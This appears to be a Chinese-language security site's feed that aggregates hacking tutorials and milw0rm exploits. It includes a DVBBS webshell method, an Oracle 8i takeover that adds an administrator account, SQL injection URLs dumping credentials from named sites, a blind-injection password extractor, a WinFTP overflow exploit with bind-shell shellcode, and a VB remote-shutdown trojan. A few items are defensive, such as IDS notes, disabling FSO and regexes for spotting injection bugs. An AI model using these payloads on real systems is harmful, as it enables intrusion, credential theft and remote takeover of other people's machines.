  二、“獵殺”及重調安全政策的漏洞
  所謂“獵殺”,就是在伺服器中設定一個陷阱,如有意打開一個埠,用檢測系統對其進行24小時的嚴密盯防,當駭客嘗試通過該埠入侵時,檢測系統就會及時地將其封鎖。網路入侵偵測系統的“獵殺”及重新調整防火牆安全政策設置功能,雖然能即時阻斷攻擊動作,但這種阻斷動作僅能適用TCP Session,要完全限制,就必須依賴重新調整防火牆安全政策設置的功能,同時也可能造成另一種反效果:即時阻斷的動作會讓攻擊者發現IDS的存在,攻擊者通常會尋找規避方式,或轉向對IDS進行攻擊。重新設置防火牆的安全政策,若設置不當,也可能造成被攻擊者用來做阻斷服務(Denial of Service)攻擊的工具:經過適當的設計,若網路入侵偵測的檢查不足,攻擊者可以偽裝成其他的正常IP來源進行攻擊動作,入侵偵測系統若貿然限制這些來源的IP,將會導致那些合法用戶因攻擊者的攻擊而無法使用。論是識別方式的設計,還是所謂的“獵殺”及重新設置防火牆安全政策的設置功能,都有其利弊。能夠實地瞭解入侵偵測系統的識別方式,或進行其識別手法的調整,將有助於提高入侵偵測系統運作的正確性。對“獵殺”及重新調整防火牆安全政策設置功能工具的使用,則應仔細評估其效益與相應的損失,這樣才能有效地發揮網路入侵偵測系統的功能。

]]> http://safe.dchsoft.com/content/client/client.html?id=13 <![CDATA[教你dvbbs7.0和8.0 access 後臺拿webshell]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2009-01-31T00:00:00+08:00 2009-01-31T00:00:00+08:00   新建一個文字檔,命名為b.txt,並寫入一句話木馬
  在命令列下輸入命令copy a.mdb/b+b.txt/b c.mdb
  得到的c.mdb就是已插入一句話木馬的資料庫
  然後在發帖子的地方上傳附件,將這個資料庫尾碼改為RAR
  預覽帖子,點擊附件下載,便可以得到上傳位址
  進入後臺,恢復資料庫,輸入已上傳檔的相對路徑,在目的檔案中一定要寫.asp格式
  提示恢復成功,成功拿到webshell
  8.0:
  2003系統:
  ①採用修改論壇基本設置中的上傳目錄設定 設置成xxx.asp/ 上傳經過資料庫合併的ASP木馬..改尾碼名上傳....即可得到Shell
  ②資料庫備份的目錄改為/xx.asp/1.mdb
  因為DVBBS 8.0..只能備份成mdb的格式....
  End if
  backpath=server.mappath(backpath)
  If Lcase(Mid(backpath,instrRev(backpath,".")+1))<>"mdb" Then
  response.write "保存資料庫名不合法"
  Response.End
  End If
  這裡 我們可以把路徑改為xxx.asp 比如 xxxx.asp/1.mdb
  1.mdb裡插入了一句話木馬 這樣是可以得到shell的上傳尾碼中加php等.上傳後在後臺附件管理中找到路徑,得到shell.
  feedom.net

]]> http://safe.dchsoft.com/content/client/client.html?id=14 <![CDATA[Oracle8i入侵系統之旅]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2009-01-31T00:00:00+08:00 2009-01-31T00:00:00+08:00
  埠 1521 是 Oracle 的 TNS Listener 默認監聽的埠,通過掃描報告還可以看到 Oracle 的版本為 8i.現在還不 知道對方的作業系統版本,看到主機還開放了終端服務,直接連上去看下作業系統版本

  確定作業系統版本為 Windows Server 2003 企業版。Oracle 10g 之前的版本預設情況下是允許遠端系統管理 TNS Listener 的,這台主機的 Oracle 版本為 8i,我們通過 TNS Listenner 來收集下更多的詳細資訊.如果本地安裝了 Oracle 可以直接調用 Lsnrctl 連接到測試的主機

  通過輸入"status "命令我們可以得到 oracle 詳細版本(8.1.70.0),作業系統(Windows),跟蹤級別為 OFF(說明沒 有開啟審核),安全性為 OFF(說明沒有設置 Listener 口令),日誌檔的絕對路徑(判斷 Oracle 安裝路徑),資料庫的 SID(ccdr).

  要遠端系統管理 Oracle, 需要知道 IP,資料庫的 SID,和連接的用戶名和密碼.IP 和 SID 我們已經知道了. 接下來用oscanner 工具掃描下要測試主機是否存在預設的密碼.

看來管理員安裝完Oracle8i 後就沒有進行進一步的安全配置 , 所有的用戶名密碼都是預設的。 在Oracle 中,SYS/SYSTEM 都是具有 DBA 許可權的帳戶,我這裡選擇使用 SYSTEM/MA NAGER 來連接資料庫.在本地用 Sqlplus 連接到目標 Oracle 資料庫,命令為:SqlPlus system/manager@//victimip:1521/ccdr連接成功後,可以通過 PL/SQL 來運行 OS 命令,首先需要創建庫來定位 msvcrt.dll 文件.這裡需要使用完整的路徑,通過剛才對主機的 查點我們已經知道作業系統為win2003, 如果系統安裝到C盤的話 , 那msvcrt.dll 預設路徑就為

  c:\windows\system32\msvcrt.dll.創建庫的命令如下:

  CREATE OR REPLACE LIBRARY exec_shell AS ’c:\windows\system32\msvcrt.dll’;

  接下來寫一個過程來調用 msvcrt.dll 裡的 system()函數.命令如下:

  CREATE OR REPLACE PACKAGE oracmd IS

  PROCEDURE exec (cmdstring IN CHAR);

  end oracmd;

  /

  CREATE ORE REPLACE PACKAGE BODY oracmd IS

  PROCEDURE exec (cmdstring IN CHAR)

  IS EXTERNAL

  NAME "system"

  LIBRARY exec_shell

  LANGUAGE C;

  end oracmd;

  /

  創建完後,就可以運行 OS 命令了.由於主機已經開放了終端服務,所以我這裡添加個管理員,然後連接伺服器.命令如下:

  exec oracmd.exec (’net user mickey imissyou /add’);

  exec oracmd.exec (’net localgroup administrators mickey /add’);

  帳戶創建完成後,如圖 5,就可以連接終端服務了,一台OO到手了.:-)

]]> http://safe.dchsoft.com/content/client/client.html?id=15 <![CDATA[Mambo Component SOBI2 RC 2.8.2 (bid) SQL Injection Vulnerability SQL注入漏洞]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2009-01-31T00:00:00+08:00 2009-01-31T00:00:00+08:00 | |
| GoTo H3LL { Israel & Usa } |
| |
| Proud To Be A MusLiM , Proud To Be A EgYpTiaN |
| |
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+


<<!>> Found by : Br1ght D@rk

<<!>> C0ntact : MiDo2005_2010 [at] hotmail.com

<<!>> Groups : EgY C0D3RS TeaM , SeCuRiTy G33KS

=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================


<<->> D0rk : find it

<<->> Exploit :>>>

:>>> http://www.site.co.il/index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+0,concat(username,0x3a3a,password),0+from+jos_users--

<<->> DeM00 :>>> http://www.karmel.co.il/index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+1,concat(username,0x3a3a,password),3+from+jos_users--

=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================

<<->> All freinds , all muslims , Egy C0ders , AsbMay Group,sec-geeks.com

<--[ sec-geeks.com ]-->

# milw0rm.com

]]> http://safe.dchsoft.com/content/client/client.html?id=16 <![CDATA[SQL注入/跨站腳本 Joomla Component beamospetition 1.0.12 SQL Injection / XSS]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2009-01-31T00:00:00+08:00 2009-01-31T00:00:00+08:00
Author : vds_s

Dork : "Powered by beamospetition 1.0.12"

Dl : http://joomlacode.org/gf/project/beamospetition/

Xss : http://[site]/?option=com_beamospetition&func=sign&pet='><script>alert('Xss')</script>

Sql Injection : http://[site]/?option=com_beamospetition&func=sign&mpid=-9999'%20union%20select%200,1,username,password,4,5,6,7,8,9,10,11,12,13,14,15%20from%20jos_users/*

# milw0rm.com

]]> http://safe.dchsoft.com/content/client/client.html?id=17 <![CDATA[盲SQL注入漏洞 Pardal CMS <= 0.2.0 Blind SQL Injection Exploit]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2009-01-31T00:00:00+08:00 2009-01-31T00:00:00+08:00 --+++====== Pardal CMS <= 0.2.0 Blind SQL Injection Exploit ======+++--
--+++=============================================================+++--

<?php

function usage ()
{
echo "\nPardal CMS <= 0.2.0 Blind SQL Injection Exploit".
"\n[+] Author : darkjoker".
"\n[+] Site : http://darkjoker.net23.net".
"\n[+] Download: http://tinyurl.com/csg4vt".
"\n[+] Usage : php xpl.php <hostname> <path> <username>".
"\n[+] Ex. : php xpl.php localhost /PardalCMS Admin".
"\n\n";
exit ();
}


function query ($user, $chr, $pos)
{
$query = "x' OR ASCII(SUBSTRING((SELECT senha FROM users WHERE login = '{$user}'),{$pos},1))='{$chr}";
$query = str_replace (" ", "%20", $query);
$query = str_replace ("'", "%27", $query);
return $query;
}

function exploit ($hostname, $path, $user, $pos, $chr)
{
$chr = ord ($chr);
$fp = fsockopen ($hostname, 80);
$query = query ($user, $chr, $pos);
$request = "GET {$path}/comentar.php?id={$query} HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";

fputs ($fp, $request);
while (!feof ($fp))
$reply .= fgets ($fp, 1024);

fclose ($fp);

if (preg_match ("/\"#FFFFFF\"> em <\/font>/", $reply))
return false;
else
return true;
}

if ($argc != 4)
usage ();

$hostname = $argv [1];
$path = $argv [2];
$username = $argv [3];
$key = "abcdef0123456789";
$pos = 1;
$chr = 0;

echo "[+] Password: ";

while ($pos <= 32)
{
if (exploit ($hostname, $path, $username, $pos, $key [$chr]))
{
echo $key [$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}

echo "\n\n";

?>

# milw0rm.com

]]> http://safe.dchsoft.com/content/client/client.html?id=18 <![CDATA[Max.Blog SQL注入漏洞 Max.Blog <= 1.0.6 (show_post.php) SQL Injection Vulnerability]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2009-01-31T00:00:00+08:00 2009-01-31T00:00:00+08:00

Application: Max.Blog http://www.mzbservices.com
Version: Max.Blog <= 1.0.6
Bug: * SQL Injection
Exploitation: Remote
Dork: intext:"Powered by Max.Blog"
Date: 20 Jan 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@gmail.com


############################################################################

- BUGS

SQL Injection:

File affected: show_post.php

This bug allows a guest to view username and password (md5) of a
registered user with the specified id (usually 1 for the admin)

http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username: ', username),concat('password: ', password),4,5,6,7+FROM+users+WHERE+id=1%23

############################################################################

# milw0rm.com

]]> http://safe.dchsoft.com/content/client/client.html?id=19 <![CDATA[遠程緩衝區溢位漏洞 WinFTP 2.3.0 (LIST) Remote Buffer Overflow Exploit (post-auth)]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2009-01-31T00:00:00+08:00 2009-01-31T00:00:00+08:00 #
# WinFTP 2.3.0 post-auth remote exploit. (www.wftpserver.com)
#
################################################################################
# #
# root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl #
# #
# Usage: winftp-remote.pl <host> <username> <password> <target> #
# #
# Target: 1 -> Win2k #
# Target: 2 -> WinXP sp2/3 (DoS only) #
# #
# root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl 10.0.0.5 user1 pass1 1 #
# #
# [=] Connected. #
# [=] Sending user user1 #
# [=] Sending pass pass1 #
# [=] Sending payload... #
# [=] Done. You should have a command shell on port 7777. #
# #
# root@halcyon:~/Exploits/WinFTP# nc 10.0.0.5 7777 #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-1999 Microsoft Corp. #
# #
# C:\Program Files\WinFTP Server> #
# #
################################################################################
#
# Quick description of the exploit:
#
# There is a post-auth bug in WFTPSRV.exe (2.3.0), in the handling of the LIST
# command. This appears to be different from the previous vuln found in
# the handling of the NLIST command. Providing the server with
# "LIST *<long string here>" results in an arbitrary memory overwrite
# vulnerability. Note that simply giving LIST a long string won't trigger
# the vuln. At least in my testing, the asterisk was necessary to force
# WFTPSRV.exe to process the long string, which clobbers various stored
# addresses, providing an opportunity for an arbitrary DWORD overwrite.
# So exploitation goes like this:
#
# format string vuln -> overflow -> arbitrary memory overwrite -> EIP control
#
# On Win2k, the error is:
# "The instruction at 0x77fc9906 referenced memory at
# 0x88776655. The memory could not be "written".
#
# Which is what we want to see in order to control an arbitrary DWORD.
# At this point our registers look like:
#
# EAX 010922E0
# ECX 0275FC14
# EDX 88776655
# EBX 00000028
# ESP 0275F688
# EBP 0275F81C
# ESI 00F90000
# EDI 00F90378
# EIP 77FC9906 ntdll.77FC9906
#
# Instructions look like:
#
# 77FC98F4 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8]
# 77FC98F7 898D 38FFFFFF MOV DWORD PTR SS:[EBP-C8],ECX
# 77FC98FD 8B50 0C MOV EDX,DWORD PTR DS:[EAX+C]
# 77FC9900 8995 34FFFFFF MOV DWORD PTR SS:[EBP-CC],EDX
# 77FC9906 890A MOV DWORD PTR DS:[EDX],ECX
# 77FC9908 8951 04 MOV DWORD PTR DS:[ECX+4],EDX
#
# Under normal conditions EDX and ECX contain pointers located
# in the data segment. However, after exploitation we control
# EDX (where to write), and ECX (what to write). From here,
# we load EDX with (almost) any old return address on our stack,
# and ECX with a pointer to our shellcode.
#
# Note: This is *not* a predictable vuln. I noticed even changing
# the filename of the binary causes the offsets to change.
# Please experiment on your own. Let me know if you manage to
# get it working under WinXP SP2.
# joewalko@gmail.com

use IO::Socket;

if (@ARGV < 2) {
print "\nUsage: $0 <host> <username> <password> <target>\n\n";
print "Target: 1 -> Win2k\n";
print "Target: 2 -> WinXP sp2/3 (DoS only)\n\n";
exit;
};

$host = $ARGV[0];
$username = $ARGV[1];
$password = $ARGV[2];
$port = 21;
$list = "\x4c\x49\x53\x54\x20\x2a";
$padding = "\x41" x 272;

$sock = new IO::Socket::INET
(
PeerAddr=> "$host",
PeerPort=> "$port",
Proto => 'tcp'
);

die "Connection failed: $!\n\n" unless $sock;
$user_string = "user $username\r\n";
$pass_string = "pass $password\r\n";
$port_string = "PORT 10,0,0,1,154,119\r\n"; # Source host doesn't matter.


$address2k = "\x74\xf8\x74\x02". # <- This needs to contain any
# readable address, or we
# immediately cause an exception.

"\x14\xfc\x75\x02". # <- This will become EIP. It points
# to our shellcode.

"\x74\xf8\x75\x02"; # <- This specifies what DWORD to overwrite.
# YMMV here. I picked an arbitrary
# return address on the stack located
# near where ESP was during
# the exception. On my system this
# is:
#
# 0275F874 73D34154 RETURN to MFC42.73D34154
$nopsled = "\x90" x 2228;


# Metasploit win32_bind, EXITFUNC=process LPORT=7777
$shellcode =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x10".
"\x92\xe9\xd3\x83\xeb\xfc\xe2\xf4\xec\xf8\x02\x9e\xf8\x6b\x16\x2c".
"\xef\xf2\x62\xbf\x34\xb6\x62\x96\x2c\x19\x95\xd6\x68\x93\x06\x58".
"\x5f\x8a\x62\x8c\x30\x93\x02\x9a\x9b\xa6\x62\xd2\xfe\xa3\x29\x4a".
"\xbc\x16\x29\xa7\x17\x53\x23\xde\x11\x50\x02\x27\x2b\xc6\xcd\xfb".
"\x65\x77\x62\x8c\x34\x93\x02\xb5\x9b\x9e\xa2\x58\x4f\x8e\xe8\x38".
"\x13\xbe\x62\x5a\x7c\xb6\xf5\xb2\xd3\xa3\x32\xb7\x9b\xd1\xd9\x58".
"\x50\x9e\x62\xa3\x0c\x3f\x62\x93\x18\xcc\x81\x5d\x5e\x9c\x05\x83".
"\xef\x44\x8f\x80\x76\xfa\xda\xe1\x78\xe5\x9a\xe1\x4f\xc6\x16\x03".
"\x78\x59\x04\x2f\x2b\xc2\x16\x05\x4f\x1b\x0c\xb5\x91\x7f\xe1\xd1".
"\x45\xf8\xeb\x2c\xc0\xfa\x30\xda\xe5\x3f\xbe\x2c\xc6\xc1\xba\x80".
"\x43\xc1\xaa\x80\x53\xc1\x16\x03\x76\xfa\xf7\xb2\x76\xc1\x60\x32".
"\x85\xfa\x4d\xc9\x60\x55\xbe\x2c\xc6\xf8\xf9\x82\x45\x6d\x39\xbb".
"\xb4\x3f\xc7\x3a\x47\x6d\x3f\x80\x45\x6d\x39\xbb\xf5\xdb\x6f\x9a".
"\x47\x6d\x3f\x83\x44\xc6\xbc\x2c\xc0\x01\x81\x34\x69\x54\x90\x84".
"\xef\x44\xbc\x2c\xc0\xf4\x83\xb7\x76\xfa\x8a\xbe\x99\x77\x83\x83".
"\x49\xbb\x25\x5a\xf7\xf8\xad\x5a\xf2\xa3\x29\x20\xba\x6c\xab\xfe".
"\xee\xd0\xc5\x40\x9d\xe8\xd1\x78\xbb\x39\x81\xa1\xee\x21\xff\x2c".
"\x65\xd6\x16\x05\x4b\xc5\xbb\x82\x41\xc3\x83\xd2\x41\xc3\xbc\x82".
"\xef\x42\x81\x7e\xc9\x97\x27\x80\xef\x44\x83\x2c\xef\xa5\x16\x03".
"\x9b\xc5\x15\x50\xd4\xf6\x16\x05\x42\x6d\x39\xbb\xe0\x18\xed\x8c".
"\x43\x6d\x3f\x2c\xc0\x92\xe9\xd3\x0d\x0a";


if ($ARGV[3] == '1')
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}

elsif ($ARGV[3] == '2')
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}

else
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}


print "\n[=] Connected.\n";
sleep 1;

print "[=] Sending $user_string";
$sock->send($user_string);
sleep 1;

print "[=] Sending $pass_string";
$sock->send($pass_string);
sleep 1;

$sock->send($port_string);
sleep 1;

print "[=] Sending payload...\n";
$sock->send($payload);
sleep 1;


if ($ARGV[3] == '1')
{
print "[=] Done. You should have a command shell on port 7777.\n\n";
}

elsif ($ARGV[3] == '2')
{
print "[=] Done. WinFTP should be crashed on the remote host.\n\n";
}

else
{
print "[=] Done.\n\n";
}

# milw0rm.com

]]> http://safe.dchsoft.com/content/client/client.html?id=20 <![CDATA[隱形木馬在系統中的啟動方式]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-11-10T00:00:00+08:00 2008-11-10T00:00:00+08:00
  另一種鮮為人知的啟動方式,是在“開始→執行”中執行“Gpedit.msc”。打開“群組原則物件編輯器”,可看到“本機電腦原則”中有兩個選項:“電腦設定”與“使用者設定”,展開“使用者設定→系統管理範本→系統→登入”,按兩下“在使用者登入時執行這些程式”子項進行屬性設置,選定“設置”項中的“已啟用”項並按一下“顯示”按鈕彈出“顯示內容”視窗,再按一下“添加”按鈕,在“添加專案”視窗內的文字方塊中輸入要自啟動的程式的路徑,如圖所示,按一下“確定”按鈕就完成了。

  添加需要啟動的檔面

  重新開機電腦,系統在登錄時就會自動啟動你添加的程式,如果剛才添加的是木馬程式,那麼一個“隱形”木馬就這樣誕生了。因為用這種方式添加的自啟動程式在系統的“系統組態實用程式”是找不到的,同樣在我們所熟知的登錄檔項中也是找不到的,所以非常危險。

  通過這種方式添加的自啟動程式雖然被記錄在登錄檔中,但是不在我們所熟知的登錄檔的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]項和[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]項內,而是在冊表的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]項。如果你懷疑你的電腦被種了“木馬”,可是又找不到它在哪兒,建議你到登錄檔的[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]項裡找找吧,或是進入“群組原則”的“在使用者登錄時執行這些程式”看看有沒有啟動的程式。

  現在網頁木馬無非有以下幾種方式中到你的機器裡

  1:把木馬檔改成BMP檔,然後配合你機器裡的DEBUG來還原成EXE,網上存在該木馬20%

  2:下載一個TXT檔到你機器,然後裡面有具體的FTP^-^作,FTP連上他們有木馬的機器下載木馬,網上存在該木馬20%

  3:也是最常用的方式,下載一個HTA檔,然後用網頁控制項解譯器來還原木馬。該木馬在網上存在50%以上

  4:採用JS腳本,用VBS腳本來執行木馬檔,該型木馬偷QQ的比較多,偷傳奇的少,大概占10%左右

  5:ARP欺騙,利用ARP欺騙攔截局域網資料,攻擊閘道。在資料包中插入木馬。解決方案,安裝ARP防火牆。
]]> http://safe.dchsoft.com/content/client/client.html?id=11 <![CDATA[利用VB實現的木馬攻擊]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-11-03T00:00:00+08:00 2008-11-03T00:00:00+08:00 首先,新建一工程,名為Server,新建一個表單,Name為Server,在表單中加入一個winsock控制項,Name設為sckServer,協議設為預設的TCP/IP協議。
 接下來我們回來Server表單模組中,添加如下代碼:
Private Sub form_Load()
  With Me
   .sckServer.LocalPort = 88917'本地埠(呵呵!我的生日!)
   .sckServer.Listen '開始監聽
  End With
End Sub
'接受用戶端的連接請求。
Private Sub sckServer_ConnectionRequest(ByVal requestID As Long)
  With Me
   If .sckServer.State <>sckClosed Then .sckServer.Close
   .sckServer.Accept (requestID)
  End With
End Sub
   下面我們來建立用戶端程式:新建一個工程,名為Client,把表單名為Client,在上面加入一個winsock控制項,名為sckClient,協定為TCP/IP協定。再加一個按鈕cmdConnect在表單模組中加入代碼:
Private Sub form_Load()
  With Me
   .sckClient.RemoteHost = "127.0.0.1"'設置遠程IP,本例設為本機。
   .sckClient.RemotePort = 88917 '遠端埠,就為server中的設置一樣.
  End With
End Sub
Private sub cmdConnect_Click()
  SckClient.Connect
End sub
   至此,按一下Connect按鈕我們的兩個工程已經可以進行通信了,但看不見,你可以在Client中的sckClient_Connect事件中加入代碼:debug.print “Connetion successful!”來查看。
   這僅是第一步,一點工作也做不了,下面我們來為它們添加功能。為了簡單,本文章只實現一點小小的功能―――關機,重啟,註銷。好,開始吧!
   在Server工程中新建一個模組,Name為modApi,這個模快為一些API函數,添加如下API函數:
Public Declare Function ExitWindowXXX Lib "user32" Alias "ExitWindowXXX" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Public Const EWX_LOGOFF = 0
Public Const EWX_REBOOT = 2
Public Const EWX_SHUTDOWN = 1
Public Declare Function ClipCursor Lib "user32" Alias "ClipCursor" (lpRect As Any) As Long
Public Type RECT
  Left As Long
  Top As Long
  Right As Long
  Bottom As Long
End Type
   注:在兩個socket中程式設計中,進行通信的重要事件是DataArrival事件,用於接收遠端資料。
   下面在Client工程的Client表單中放入三個按鈕,分別為cmdExit,cmdLogoff,cmdReboot。它們用於對遠程的關機,註銷,重啟操作。分別添加如下代碼:
Private Sub cmdExit_Click()
  Me.sckClient.SendData "Exit"
End Sub
Private Sub cmdLogoff_Click()
  Me.sckClient.SendData "Logoff"
End Sub
Private Sub cmdReboot_Click()
  Me.sckClient.SendData "Reboot"
End Sub
   全都是對服務端發出請求。下面轉到Server工程中:在Server中添加sckServer的DataArrial事件,接收用戶端的請求。
Private Sub sckServer_DataArrival(ByVal bytesTotal As Long)
  Dim strData As String
  With Me
   ' 接收客戶請求的資訊
   .sckServer.GetData strData
   Select Case strData
    Case "Exit"
     '關機
     Call ExitWindowXXX(EWX_SHUTDOWN, 0)
    Case "Reboot"
     '重啟
     Call ExitWindowXXX(EWX_REBOOT, 0)
    Case "Logoff"
     '註銷
    Call ExitWindowXXX(EWX_LOGOFF, 0)
   End Select
  End With
End Sub
   好了,到此我們已經實現功能了,但還不行,我們要它在背後運行。這簡單,在Server中的form_Load事件中加入一句:me.hide。好這下看不見了,但大家知道木馬是一開機就自動運行了,這又是為什麼,怎麼實現的?把它加入到註冊表的啟動組中?對,不錯,跟我來吧!
   回到Server工程中的modApi中加入如下API函數:
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

]]> http://safe.dchsoft.com/content/client/clients2.html?id=9 <![CDATA[突破FSO限制奪取系統許可權]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-11-03T00:00:00+08:00 2008-11-03T00:00:00+08:00 Set |link|FSO|link|=CreateObject("Scripting.FileSystemObject1")
原本應該是
CreateObject("Scripting.FileSystemObject")
原因是把登錄檔裡面的名字改掉了

提升許可權:

把解釋ASP腳本的C:\WINNT\System32\inetsrv\asp.dll這個ISAPI程式添加到/LM/W3SVCInProcessIsapiApps裡面

甚麼是|link|FSO|link|?

  我們知道,除了CreateObject方法以外,也可以使用一般的<object>

  標注建立一個元件,我們可以在ASP裡面使用HTML的<object>標注,以便在網頁中加入一個元件。方法是: <object runat=server id=fs1 scope=page progid="Scripting.FileSystemObject"></object> Runat表示在服務端執行,Scope表示元件的生命週期,可以選用Session,Application或page(表示當前頁面,也可缺省)。這種寫法對我們沒用,還有一種寫法是:<object runat=server id=fs1 scope=page classid="clsid:clsid的值"></object>我們也可以通過修改該Clsid的值而禁用該元件,如將註冊表中:HKEY_CLASSES_ROOT\Scripting.FileSystemObject\CLSID的值0D43FE01-F093-11CF-8940-00A0C9054228改成0D43FE01-F093-11CF-8940-00A0C9054229(改了最後面一位),這時候的寫法為:<object runat=server id=fs1 scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054229"></object> 看運行結果,沒問題,OK。這時候我們再用:<object runat=server id=fs1 scope=page classid="clsid:0D43FE01-F093-11 CF-8940-00A0C9054228"></object>

  這時候就出錯了。新建一用戶:Iusr_機器名,IIS裡設置對應網站的匿名使用者IUSR_機器名,CACLS:設置目錄許可權。這樣FSO可用,但不會影響別人,不過這也是治標不治本的方法,如果你自己並不需要FSO的話,最好還是輸入:RegSrv32 /u C:\WINDOWS\SYSTEM32\scrrun.dll這個命令來徹底禁用FSO吧!
]]> http://safe.dchsoft.com/content/client/clients2.html?id=10 <![CDATA[EditPlus查找PHP源碼簡單數字型注入的規則運算式]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-09-13T00:00:00+08:00 2008-09-13T00:00:00+08:00
  1.查找select、update、delete語句

  ((select|SELECT|update|UPDATE|delete|DELETE)+.*(from|FROM|set|SET)+.*(where|WHERE)+.*)

  查詢語句,對於沒有條件判斷的基本不存在注入問題,因而僅搜索此語句即可

  例子:

  select * from user where

  2.簡單的數字型注入

  ((select|SELECT|update|UPDATE|delete|DELETE)+.*(from|FROM|set|SET)+.*(where|WHERE)+.*=[ ]?["]?["]?\$)

  能找到select、update delete三種語句,5種格式的整形注入,如:

  直接變數傳入

  select * from guess where id=$subject_id

  update guess set is_valid=0 where id=$subject_id

  delete from guess where id=$subject_id

  =與變數之間存在空格

  select * from guess where id= $subject_id

  update guess set is_valid=0 where id= $subject_id

  delete from guess where id= $subject_id

  變數雙引號

  select * from guess where id="$subject_id"

  update guess set is_valid=0 where id="$subject_id"

  delete from guess where id="$subject_id"

  =與雙引號之間存在空格

  select * from guess where id= "$subject_id"

  update guess set is_valid=0 where id= "$subject_id"

  delete from guess where id= "$subject_id"

  =與引號、雙引號之間存在空格

  select * from guess where id= " $subject_id"

  update guess set is_valid=0 where id= " $subject_id"

  delete from guess where id= " $subject_id"

  其實自己發現其他的一些漏洞也可以找到相應關鍵字尋找的,當然這些僅限於比較容易看出來的漏洞了,^_^。
]]> http://safe.dchsoft.com/content/client/clients2.html?id=6 <![CDATA[入侵的藝術(無線滲透)]]> Snoopy http://safe.dchsoft.com/ service@dchsoft.com 2008-09-13T00:00:00+08:00 2008-09-13T00:00:00+08:00   “最近,有一家公司想要我們竊取Seraph公司的本年度銷售計畫,當然,其它的資訊越多也越好。至於報酬,就得看你的想像力了。你最近要是有時間的話就開始吧。我已經幫你簡單地看了下,那公司的網站伺服器的作業系統是Gentoo,網路設有硬體防火牆,用了IDS。祝你好運!”
  Bacchus一下子就聽出了這是Ezekiel的聲音。接到這條消息後,Bacchus變得異常興奮,特別是在聽到報酬情況時。當然,他實際上並不在乎報酬,入侵是他的愛好,那些報酬只是能讓他過得好點罷了,他真正在乎的是他沒有被遺忘。
  他從床上蹦下來後就立刻開了機。他做了幾個跳板後就操起了他常用的兵器。他用了nmap掃描埠,有檢測了網站是否存在注入、跨站、檔包含、跨目錄、暴庫等常見漏洞,他還檢測了伺服器是否存在溢出漏洞。不幸的是,伺服器堅如磐石,無懈可擊。他心裡想:看來用Gentoo作系統的管理員果然不是一般貨色。忙活了大半天,他卻一無所獲。肚子這時也開始鬧騰起來,於是他從冰箱裡拿出了幾片麵包,一下子塞了進去,打發了肚子,還不忘用牛奶討好一下它。
  這一天,他九點就睡了,但始終想著那檔子事,一直沒睡著。於是他撥通了Moses的電話,想得到點啟發。恰巧Moses也沒睡。電話一接通,Bacchus就開始訴苦,Moses聽完後說:“你也許該換個思路。”Bacchus不好意思聊地太晚,免得打擾別人,便草草收了尾。
  第二天清早,他就打開了Seraph公司的網站,他注意到了主頁底端的地址——那公司就在當地,儘管離他家還有一定的距離。於是他決定親自去打探點資訊。由於最近油價飛漲,他決定做公汽去。臨走之前,他被客廳內鏡子中的自己的愛因斯坦式的頭型嚇了一跳,他這才猛然驚醒,意識到自己還要再好好準備一下。望著鏡前的自己,他想到了什麼——他目前還是單身。不過他喜歡這種生活,他曾說他是認真的,並發誓他決不會哪天撞上誰後又讚美愛的偉大。他原來還打算終身不娶,不過之後便淡去了這個念頭。他立刻回到了現實,帶上了自己的PDA,把耳機塞上,以聽音樂來打發旅途的時光。他想起了Moses的話,他在Windows Mobile上打開了WiFiForm進行對無線接入點的偵察,暗自想著也許會有什麼以外收穫,到時候或許會探測到Seraph公司的內部無線接入點。至於聽什麼,他想了想,就選了Stravinsky的《火鳥》,因為他算了下,到Seraph公司大概需要20分鐘,到時候恰好可以聽完,更重要的是,他尤其喜愛這一部作品,特別是其中的《公主之舞》。
  他喜歡輕裝上陣。
